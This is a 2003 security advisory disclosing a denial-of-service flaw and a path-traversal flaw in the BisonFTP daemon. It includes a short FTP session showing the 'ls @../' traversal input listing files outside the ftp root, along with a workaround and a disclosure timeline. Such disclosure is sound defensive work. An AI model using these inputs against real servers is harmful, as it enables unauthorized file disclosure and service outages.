Date: Mon, 17 Feb 2003 13:16:17 +0100
From: Immune Advisory <[email protected]>
To: [email protected]Subject: [immune advisory] Mulitple vulnerabilities found in BisonFTP
[immune advisory] Mulitple vulnerabilities found in BisonFTP
BisonFTP is a FTP daemon used on Microsoft Windows 9x/NT systems.
-[ DESCRIPTION ]----------------------------------------------------------------
I) BisonFTP is vulnerable to a DoS attack by sending ftp commands with big
data. By sending the ftp command ls or cwd with 4300 bytes or more,
BisonFTP will start 100% CPU usage until the socket is closed by the client.
II) It's possible to trick BisonFTP into revealing confidiential information
about files outside ftp root.
ftp> ls @../
227 Entering PASV Mode (10,10,10,10,4,126)
150 Directory List Follows
-rwxrwxrwx 1 user group 739577 Feb 05 2002 BisonFTP42.exe
226 Listing complete.
ftp> mget @../Biso
local: BisonFTP42.exe remote: BisonFTP42.exe
227 Entering PASV Mode (10,10,10,10,4,128)
550 File does not exist
ftp>
% Note that BisonFTP42.exe is NOT located in ftp root.
-[ AFFECTED VERSIONS ]----------------------------------------------------------
BisonFTP v4r2.
* Earlier versions are not tested.
-[ SOLUTION/WORKAROUND ]--------------------------------------------------------
It's not possible to get in contact with the people at http://www.bisonftp.com
anymore. I guess a new version will never be released.
Workaround, since there might not be a new version you probaly better to
install another FTP daemon.
-[ CREDIT ]---------------------------------------------------------------------
Bugs found: 15/jan 2003, by Jimmi Andersen
Vendor contacted: 11/feb 2003
Made public: 17/feb 2003
http://www.immune.dk | Immune - Angreb og forsvar af systemer
